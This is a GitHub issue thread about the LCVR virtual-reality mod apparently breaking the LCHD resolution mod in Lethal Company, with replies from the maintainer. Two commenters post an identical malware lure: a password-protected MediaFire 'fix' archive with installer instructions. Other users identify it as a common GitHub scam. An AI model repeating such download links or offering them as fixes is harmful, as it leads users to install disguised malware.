### ISSUE TITLE
LCVR may have broken HD mod

### ISSUE THREAD

**Issue by MrCatguy** [DaXcess/LCVR#267]
Everything was working fine, had HD working. I tried out VR since it recently updated and had a good time.

Returning back to flat-screen and the game launched in a small window, I thought that was odd but I changed it to fullscreen and I noted the game had the vanilla LC resolution across all thunderstore mod profiles (tested with just bepinex and LCHD and it still didnt have HD)

I did mess with some settings in VR that controlled the resolution on my vr headset but i guess that broke something with my HD mod? Even across all profiles??? I even reinstalled LC and it didn't fix it.

Could this be fixed on my end or will a LCVR mod update need to be released to fix this?

Thanks

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MrCatguy** [comment]
Mediafire says the file is dangerous
![Screenshot 2024-08-28 031340](https://github.com/user-attachments/assets/2e941cdc-d202-4e8c-822f-6cb81d98e134)

**Comment by AmeliaGL0w0** [comment]
> Mediafire says the file is dangerous ![Screenshot 2024-08-28 031340](https://private-user-images.githubusercontent.com/177634450/361866742-2e941cdc-d202-4e8c-822f-6cb81d98e134.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NzE5OTgsIm5iZiI6MTcyNDc3MTY5OCwicGF0aCI6Ii8xNzc2MzQ0NTAvMzYxODY2NzQyLTJlOTQxY2RjLWQyMDItNGU4Yy04MjJmLTZjYjgxZDk4ZTEzNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QxNTE0NThaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kNjUzOTdkMTYwZDQ3ODNlOWNiOWMzNDNkNjcwMjcxMzVmODA5ZTZhYjQ2YmZiNTdjNGFkMjA1ZjMxODVkMGEzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.ZHmTtRIKVnV2BY7f1labF4cb3dt75ztR4LeKQ4GdUvo)

scam link

**Comment by MrCatguy** [comment]
> > Mediafire says the file is dangerous ![Screenshot 2024-08-28 031340](https://private-user-images.githubusercontent.com/177634450/361866742-2e941cdc-d202-4e8c-822f-6cb81d98e134.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NzE5OTgsIm5iZiI6MTcyNDc3MTY5OCwicGF0aCI6Ii8xNzc2MzQ0NTAvMzYxODY2NzQyLTJlOTQxY2RjLWQyMDItNGU4Yy04MjJmLTZjYjgxZDk4ZTEzNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QxNTE0NThaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kNjUzOTdkMTYwZDQ3ODNlOWNiOWMzNDNkNjcwMjcxMzVmODA5ZTZhYjQ2YmZiNTdjNGFkMjA1ZjMxODVkMGEzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.ZHmTtRIKVnV2BY7f1labF4cb3dt75ztR4LeKQ4GdUvo)
> 
> scam link

Yeah good thing mediafire saved my ass lol

**Comment by AmeliaGL0w0** [comment]
> > > Mediafire says the file is dangerous ![Screenshot 2024-08-28 031340](https://private-user-images.githubusercontent.com/177634450/361866742-2e941cdc-d202-4e8c-822f-6cb81d98e134.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NzE5OTgsIm5iZiI6MTcyNDc3MTY5OCwicGF0aCI6Ii8xNzc2MzQ0NTAvMzYxODY2NzQyLTJlOTQxY2RjLWQyMDItNGU4Yy04MjJmLTZjYjgxZDk4ZTEzNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QxNTE0NThaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kNjUzOTdkMTYwZDQ3ODNlOWNiOWMzNDNkNjcwMjcxMzVmODA5ZTZhYjQ2YmZiNTdjNGFkMjA1ZjMxODVkMGEzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.ZHmTtRIKVnV2BY7f1labF4cb3dt75ztR4LeKQ4GdUvo)
> > 
> > 
> > scam link
> 
> Yeah good thing mediafire saved my ass lol

this is a common github scam btw, so just a heads up for the future

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DaXcess** [comment]
![image](https://github.com/user-attachments/assets/eaa2e9d2-f12b-4fa2-bf96-52ac5ede9c96)
LCHD is incredibly unsupported by LCVR (don't touch canvasses or VR will break everything HUD related)

**Comment by MrCatguy** [comment]
Could I fix this somehow? Maybe deleting a config file somewhere? Changing to profiles without LCVR still didn't let the LCHD mod work.

**Comment by DaXcess** [comment]
LCHD doesn't touch your resolution, so this should never have been a problem to begin with.
In any case, the LCHD mod makes some very breaking changes to the game, in a very half-assed way (Running `FindObjectOfType` in a loop, for the entire duration of the game, which is just unnecessary work for the CPU) and I wouldn't recommend using that mod whatsoever.

**Comment by MrCatguy** [comment]
oh wow ok, can u suggest a HD mod thats better? thank you

**Comment by DaXcess** [comment]
There aren't any

also
![image](https://github.com/user-attachments/assets/20ffab9b-4ed3-4a5c-9f93-322c3f7eeb32)
